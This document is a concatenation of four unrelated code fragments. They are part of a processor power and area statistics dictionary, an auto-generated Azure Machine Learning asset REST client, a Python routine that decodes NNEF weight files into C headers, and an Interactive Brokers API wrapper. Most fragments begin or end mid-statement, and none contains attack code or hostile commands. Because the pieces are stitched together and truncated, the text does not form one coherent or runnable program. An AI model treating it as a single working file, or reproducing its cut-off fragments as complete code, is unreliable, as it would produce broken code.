'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000857234,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000346254,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000497762,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00326292,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00820552,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0333107,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.11885,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.100471,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.113138,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 4.4402,
'Instruction Fetch Unit/Runtime Dynamic': 0.258388,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0416661,
'L2/Runtime Dynamic': 0.0071598,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.36623,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.551646,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0365295,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0365295,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.53873,
'Load Store Unit/Runtime Dynamic': 0.768326,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0900756,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.180151,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0319681,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0325431,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.131742,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0166212,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.342767,
'Memory Management Unit/Runtime Dynamic': 0.0491642,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 15.2136,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0640563,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00581928,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0557547,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator 2.3.33.0
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.pipeline import ClientRawResponse
from .. import models
class AssetOperations(object):
"""AssetOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: The version of the Microsoft.MachineLearning resource provider API to use. Constant value: "2018-11-19".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.config = config
self.api_version = "2018-11-19"
def create(
self, subscription_id, resource_group_name, workspace, asset, custom_headers=None, raw=False, **operation_config):
"""Create an Asset.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: Name of the resource group in which the
workspace is located.
:type resource_group_name: str
:param workspace: The name of the workspace.
:type workspace: str
:param asset: The payload that is used to register an Asset.
:type asset: ~_restclient.models.Asset
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Asset or ClientRawResponse if raw=true
:rtype: ~_restclient.models.Asset or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ModelErrorResponseException<_restclient.models.ModelErrorResponseException>`
"""
# Construct URL
url = self.create.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("subscription_id", subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'workspace': self._serialize.url("workspace", workspace, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(asset, 'Asset')
# Construct and send request
request = self._client.post(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ModelErrorResponseException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Asset', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
create.metadata = {'url': '/modelmanagement/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspace}/assets'}
def list_query(
self, subscription_id, resource_group_name, workspace, runid=None, project_id=None, name=None, tag=None, properties=None, count=None, skip_token=None, order_by=None, custom_headers=None, raw=False, **operation_config):
"""Query the list of Assets in a workspace. If no filter is passed, the
query lists all the Assets in the given workspace. The returned list is
paginated and the count of item in each page is an optional parameter.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: Name of the resource group in which the
workspace is located.
:type resource_group_name: str
:param workspace: The name of the workspace.
:type workspace: str
:param runid: The run id.
:type runid: str
:param project_id: The project id.
:type project_id: str
:param name: The object name.
:type name: str
:param tag: The object tag.
:type tag: str
:param properties: The object key-value properties.
:type properties: str
:param count: The number of items to retrieve in a page
:type count: str
:param skip_token: The continuation token to retrieve the next page
:type skip_token: str
:param order_by: The option to order response. Possible values
include: 'CreatedAtDesc', 'CreatedAtAsc', 'UpdatedAtDesc',
'UpdatedAtAsc'
:type order_by: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: PaginatedAssetList or ClientRawResponse if raw=true
:rtype: ~_restclient.models.PaginatedAssetList or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ModelErrorResponseException<_restclient.models.ModelErrorResponseException>`
"""
# Construct URL
url = self.list_query.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("subscription_id", subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'workspace': self._serialize.url("workspace", workspace, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
if runid is not None:
query_parameters['runid'] = self._serialize.query("runid", runid, 'str')
if project_id is not None:
query_parameters['projectId'] = self._serialize.query("project_id", project_id, 'str')
if name is not None:
query_parameters['name'] = self._serialize.query("name", name, 'str')
if tag is not None:
query_parameters['tag'] = self._serialize.query("tag", tag, 'str')
if properties is not None:
query_parameters['properties'] = self._serialize.query("properties", properties, 'str')
if count is not None:
query_parameters['count'] = self._serialize.query("count", count, 'str')
if skip_token is not None:
query_parameters['$skipToken'] = self._serialize.query("skip_token", skip_token, 'str')
if order_by is not None:
query_parameters['orderBy'] = self._serialize.query("order_by", order_by, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ModelErrorResponseException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('PaginatedAssetList', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
list_query.metadata = {'url': '/modelmanagement/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspace}/assets'}
def patch(
self, subscription_id, resource_group_name, workspace, id, patch, custom_headers=None, raw=False, **operation_config):
"""Patch a specific asset.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: Name of the resource group in which the
workspace is located.
:type resource_group_name: str
:param workspace: The name of the workspace.
:type workspace: str
:param id: The object id.
:type id: str
:param patch: The payload that is used to patch an Asset.
:type patch: list[~_restclient.models.JsonPatchOperation]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Asset or ClientRawResponse if raw=true
:rtype: ~_restclient.models.Asset or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ModelErrorResponseException<_restclient.models.ModelErrorResponseException>`
"""
# Construct URL
url = self.patch.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("subscription_id", subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'workspace': self._serialize.url("workspace", workspace, 'str'),
'id': self._serialize.url("id", id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(patch, '[JsonPatchOperation]')
# Construct and send request
request = self._client.patch(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ModelErrorResponseException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Asset', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
patch.metadata = {'url': '/modelmanagement/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspace}/assets/{id}'}
def query_by_id(
self, subscription_id, resource_group_name, workspace, id, custom_headers=None, raw=False, **operation_config):
"""Gets Asset by ID.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: Name of the resource group in which the
workspace is located.
:type resource_group_name: str
:param workspace: The name of the workspace.
:type workspace: str
:param id: The object id.
:type id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Asset or ClientRawResponse if raw=true
:rtype: ~_restclient.models.Asset or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ModelErrorResponseException<_restclient.models.ModelErrorResponseException>`
"""
# Construct URL
url = self.query_by_id.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("subscription_id", subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'workspace': self._serialize.url("workspace", workspace, 'str'),
'id': self._serialize.url("id", id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ModelErrorResponseException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Asset', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
query_by_id.metadata = {'url': '/modelmanagement/v1.0/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/workspaces/{workspace}/assets/{id}'}
def delete(
self, subscription_id, resource_group_name, workspace, id, custom_headers=None, raw=False, **operation_config):
"""Deletes the specific asset.
:param subscription_id: The Azure Subscription ID.
:type subscription_id: str
:param resource_group_name: Name of the resource group in which the
workspace is located.
:type resource_group_name: str
:param workspace: The name of the workspace.
:type workspace: str
:param id: The object id.
:type id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`ModelErrorResponseException<_restclient.models.ModelErrorResponseException>`
"""
# Construct URL
url = self.delete.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("subscription_id", subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'workspace': self._serialize.url("workspace", workspace, 'str'),
'id': self._serialize.url("id", id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
| |
+ ", \\\n")
output.write("}\n")
output.close()
return indices
def decoding_data(self, input, output, name, last, identity, first):
'''
Processing a given .dat file stored in NNEF format
To be specific, a NNEF formatted neural network contains a .graph file and several .dat files.
This function deals with a given .dat file. it first reads in specifications of this file, such as
Its length and its shape. Then it will translate weights stored in binary in this .dat file into packs or digits.
The actual writing-to-header process is done by writecn and writefc functions.
:param input: IO object, corresponding to the .dat file it's reading from
:param output: IO object, corresponding to the header file it's writing to
:param name: name of the header file
:param last: whether the given .dat file is corresponded with the last batch norm layer
:param identity: whether the given .dat file contains values for conv/fc/batchnorm layer
:param first: whether it is the first matrix operations in the graph. Needed for permutation issue
:return: if the input file is a fc or cn layer and it's sparse, then non-pruned inputs number is returned.
if the input file is a batch norm layer and it's not the last one, a list with all its values are returned.
otherwise, return 0
'''
# Skip NNEF header
input.read(4)
# Length of the data in bytes
length = int.from_bytes(input.read(4), byteorder='little')
# Number of dimensions the data
rank_n = int.from_bytes(input.read(4), byteorder='little')
rank = [] # n,z,y,x
# Determine layer type
batch = (identity == 0)
fc = (identity == 1)
cn = (identity == 2)
# Get dimension sizes
for i in range(0, rank_n):
rank.append(int.from_bytes(input.read(4), byteorder='little'))
# Skip padding
input.read((8 - rank_n) * 4)
bits_per_item = int.from_bytes(input.read(4), byteorder='little')
input.read(2)
size = int(bits_per_item / 8)
# interpret as float or int
# Variables used for quantization
algo = int.from_bytes(input.read(2), byteorder='big')
signess = int.from_bytes(input.read(4), byteorder='little')
# TODO: more about linear and log quantize later
# reference: https://www.khronos.org/registry/NNEF/specs/1.0/nnef-1.0.2.html#container-structure
input.seek(128, 0)
# start reading data
# Flag for sparse operations
sparse = False
indices = []
result = []
# fc needs to be packed in column-major order
if fc:
# Holds decoded weight values
temp_array = np.zeros((rank[0], rank[1]))
for i in range(rank[0]):
for j in range(rank[1]):
temp = list(input.read(size))
# changing endianess
for b in range(0, int(len(temp) / 2)):
temp1 = temp[b]
temp[b] = temp[len(temp) - b - 1]
temp[len(temp) - b - 1] = temp1
temp = bytes(temp)
# decode as float
# If there is a zero, treat as sparse
if struct.unpack('!f', temp)[0] == 0:
sparse = True
temp_array[i, j] = struct.unpack('!f', temp)[0]
# permutation
os.chdir('..')
os.chdir(self.input_dir)
# True if permutation is required
flag = False
for root, dirs, files in os.walk("."):
for name1 in files:
if fnmatch.fnmatch(name1.replace('_', ''), name.replace('weight', 'list.npy').replace('_', '')):
print("Permuting...")
flag = True
temp_weight = np.zeros((rank[0], rank[1]))
permute_list = np.load(name1)
if first:
self.list = permute_list
# permute input channel for current layer so that we can pack weights
for i in range(rank[0]):
temp_weight[i, 0:] = np.copy(temp_array[permute_list[0, i], 0:])
# permute output channel for last layer so that channels match
if len(self.tempweight) != 0:
tt = np.copy(self.tempweight)
if len(tt.shape) == 4:
for j in range(tt.shape[3]):
self.tempweight[0:, 0:, 0:, j] = np.copy(tt[0:, 0:, 0:, permute_list[0, j]])
self.writecn(True, [tt.shape[3], tt.shape[2], tt.shape[1], tt.shape[0]], self.tempweight,
self.tempsparse, self.tempoutput, self.name)
else:
for i in range(rank[0]):
self.tempweight[0:, i] = np.copy(tt[0:, permute_list[0, i]])
self.writefc(True, tt.shape, self.tempweight, self.tempsparse, self.tempoutput, self.name)
# permute the last batch layer as well
tt = np.copy(self.var[self.tempvar])
for i in range(rank[0]):
self.var[self.tempvar][i] = np.copy(tt[permute_list[0, i]])
tt = np.copy(self.mean[self.tempmean])
for i in range(rank[0]):
self.mean[self.tempmean][i] = np.copy(tt[permute_list[0, i]])
tt = np.copy(self.gamma[self.tempgamma])
for i in range(rank[0]):
self.gamma[self.tempgamma][i] = np.copy(tt[permute_list[0, i]])
tt = np.copy(self.beta[self.tempbeta])
for i in range(rank[0]):
self.beta[self.tempbeta][i] = np.copy(tt[permute_list[0, i]])
temp_array = temp_weight
# save this layer's state so that later we can permute its output channel
self.tempweight = temp_array
self.tempoutput = output
self.tempsparse = sparse
self.name = name
self.lastlist = permute_list
break
# if there is nothing to be permuted, meaning this layer is not on the temp state in this class
# so we directly write them into header file
# otherwise, wait for it to be permuted by next layer
if flag:
indices = self.writefc(False, rank, temp_array, sparse, output, name)
else:
indices = self.writefc(True, rank, temp_array, sparse, output, name)
os.chdir("../3pxnet-compiler/autogen")
elif cn:
# first layer in a cnn
# it uses binarized dense layer, so we don't pack it
if rank[1] % 32 != 0:
output.write("#define _" + name + " {\\\n")
temp_array = np.zeros((rank[0], rank[1], rank[2], rank[3]))
for n in range(rank[0]):
for z in range(rank[1]):
for y in range(rank[2]):
for x in range(rank[3]):
temp = list(input.read(size))
# changing endianess
for b in range(0, int(len(temp) / 2)):
temp1 = temp[b]
temp[b] = temp[len(temp) - b - 1]
temp[len(temp) - b - 1] = temp1
temp = bytes(temp)
if struct.unpack('!f', temp)[0] == 0:
sparse = True
temp_array[n, z, y, x] = struct.unpack('!f', temp)[0]
print("Sparse?: " + str(sparse))
for n in range(rank[0]):
for y in range(rank[2]):
for x in range(rank[3]):
for z in range(rank[1]):
temp = temp_array[n, z, y, x]
output.write(str(int(temp)) + ", ")
output.write('\\\n')
output.write("}\n")
output.close()
# other conv layers in a cnn
else:
temp_array = np.zeros((rank[3], rank[2], rank[1], rank[0]))
for n in range(rank[0]):
for z in range(rank[1]):
for y in range(rank[2]):
for x in range(rank[3]):
temp = list(input.read(size))
# changing endianess
for b in range(0, int(len(temp) / 2)):
temp1 = temp[b]
temp[b] = temp[len(temp) - b - 1]
temp[len(temp) - b - 1] = temp1
temp = bytes(temp)
if struct.unpack('!f', temp)[0] == 0:
sparse = True
temp_array[x, y, z, n] = struct.unpack('!f', temp)[0]
print("Sparse?: " + str(sparse))
# permutation
os.chdir('..')
os.chdir(self.input_dir)
flag = False
for root, dirs, files in os.walk("."):
for name1 in files:
if fnmatch.fnmatch(name1.replace('_', ''), name.replace('weight', 'list.npy').replace('_', '')):
print("Permuting...")
flag = True
temp_weight = np.zeros((rank[3], rank[2], rank[1], rank[0]))
permute_list = np.load(name1)
if first:
self.list = permute_list
# permute input channel of current layer
for j in range(rank[0]):
for i in range(rank[1]):
temp_weight[0:, 0:, i, j] = np.copy(temp_array[0:, 0:, permute_list[0, i], j])
# permute output channel of last layer
# since it's not possible to have a fc layer before a conv layer,
# we don't consider that case here.
if len(self.tempweight) != 0:
tt = np.copy(self.tempweight)
for j in range(tt.shape[3]):
self.tempweight[0:, 0:, 0:, j] = np.copy(tt[0:, 0:, 0:, permute_list[0, j]])
self.writecn(True, [tt.shape[3], tt.shape[2], tt.shape[1], tt.shape[0]],
self.tempweight, self.tempsparse, self.tempoutput, self.name)
# permute the last batch layer as well
tt = np.copy(self.var[self.tempvar])
for i in range(rank[0]):
self.var[self.tempvar][i] = np.copy(tt[permute_list[0, i]])
tt = np.copy(self.mean[self.tempmean])
for i in range(rank[0]):
self.mean[self.tempmean][i] = np.copy(tt[permute_list[0, i]])
tt = np.copy(self.gamma[self.tempgamma])
for i in range(rank[0]):
self.gamma[self.tempgamma][i] = np.copy(tt[permute_list[0, i]])
tt = np.copy(self.beta[self.tempbeta])
for i in range(rank[0]):
self.beta[self.tempbeta][i] = np.copy(tt[permute_list[0, i]])
temp_array = temp_weight
# save this layer's state so that later we can permute its output channel
self.tempweight = temp_array
self.tempoutput = output
self.tempsparse = sparse
self.name = name
self.lastlist = permute_list
break
if flag:
indices = self.writecn(False, rank, temp_array, sparse, output, name)
else:
indices = self.writecn(True, rank, temp_array, sparse, output, name)
os.chdir("../3pxnet-compiler/autogen")
# batchnorm
else:
if last:
print("Writing to header " + name + ".h ...")
for i in range(int(length / size)):
# One great feature of NNEF is it doesn't use many concrete data types. Therefore, there are several
# encoding algorithms provided. Since current training engine will not train weights whose data types
# are not float, this converter does not support any other encoding algorithm
# TODO: depending on encoding algorithm, theoretically we should decode numbers in different ways
# TODO: more support for this later
# reference: https://www.khronos.org/registry/NNEF/specs/1.0/nnef-1.0.2.html#container-structure
if algo == 0:
temp = list(input.read(size))
# changing endianess
for j in range(0, int(len(temp) / 2)):
temp1 = temp[j]
temp[j] = temp[len(temp) - j - 1]
temp[len(temp) - j - 1] = temp1
temp = bytes(temp)
if last and | |
<gh_stars>0
"""
Created on Fri Jun 25 08:59:35 2021
@author: loann
"""
from threading import Thread
import datetime as dt
import pandas as pd
import queue
import time
import sys, os
from ibapi.client import EClient
from ibapi.wrapper import EWrapper
from ibapi.contract import Contract
from ibapi.order import Order
from ibapi.ticktype import TickTypeEnum
# from enum_IBKR import EnumContract, EnumOrder
class ERROR :
"""! \private
Error management sub-class
"""
def error(self, id, errorCode, errorString):
"""
This function print errors if they happen
"""
error_message = (
"IB Error ID (%d), Error Code (%d) with "
"response '%s'" % (id, errorCode, errorString)
)
print ("IB Error ID (%d), Error Code (%d) with response '%s'" % (id, errorCode, errorString))
self.error.put(error_message)
class QUEUE :
"""! \private
Queue management sub-class
"""
def init(self) :
file_ = queue.Queue()
self.file = file_
return file_
def get(self, file, timeout = 5) :
return file.get(timeout = timeout)
def getList(self, file, timeout = 5) :
lst = list()
while(file.qsize() > 0) :
lst.append(file.get(timeout = timeout))
file.queue.clear()
return lst
class WRAPPER(EWrapper, QUEUE, ERROR) :
"""! \private
IBKR Wrapper class.
"""
def nextValidId(self,
orderId) :
self.nextValidOrderId = orderId
print ("Next valid ID : ",self.nextValidOrderId)
def currentTime(self, time) :
if self.showLog : print ("Server time : ",time)
self.file.put(time)
def historicalData(self, reqId, bar) :
"""
See : http://interactivebrokers.github.io/tws-api/classIBApi_1_1Bar.html
and : http://interactivebrokers.github.io/tws-api/interfaceIBApi_1_1EWrapper.html#ac943e5b81f6de111ddf71a1f05ab6282
"""
dataLine = {"reqId" : reqId,
"Time" : bar.date,
"Open" : bar.open,
"High" : bar.high,
"Low" : bar.low,
"Close" : bar.close,
"Volume": bar.volume,
"Count" : bar.barCount} # The number of trades during the bar's timespan
if self.showLog : print ("Data line : ",dataLine)
self.file.put(dataLine)
def tickPrice(self,
reqId,
tickType,
price,
attrib) :
if self.showLog : print (TickTypeEnum.to_str(tickType), price, attrib.preOpen)
dataLine = {"tickType" : TickTypeEnum.to_str(tickType),
"price" : price,
"isPreOpen": attrib.preOpen}
self.file.put(dataLine)
def openOrder(self,
orderId,
contract,
order,
orderState) :
loc_order = {
"PermId" : order.permId,
"ClientId" : order.clientId,
"OrderId" : orderId,
"Account" : order.account,
"Symbol" : contract.symbol,
"SecType" : contract.secType,
"Exchange" : contract.exchange,
"Action" : order.action,
"OrderType": order.orderType,
"TotalQty" : order.totalQuantity,
"CashQty" : order.cashQty,
"LmtPrice" : order.lmtPrice,
"AuxPrice" : order.auxPrice,
"Status" : orderState.status
}
if self.showLog : print ("Placed order")
try :
self.file.put(loc_order)
except :
pass
class CLIENT(EClient) :
"""! \private
IBKR Client class
"""
def __init__(self, wrapper) :
EClient.__init__(self, wrapper)
self.showLog = False
self.reqId = 0
def start(self) :
self.thread = Thread(target = self.run)
self.thread.start()
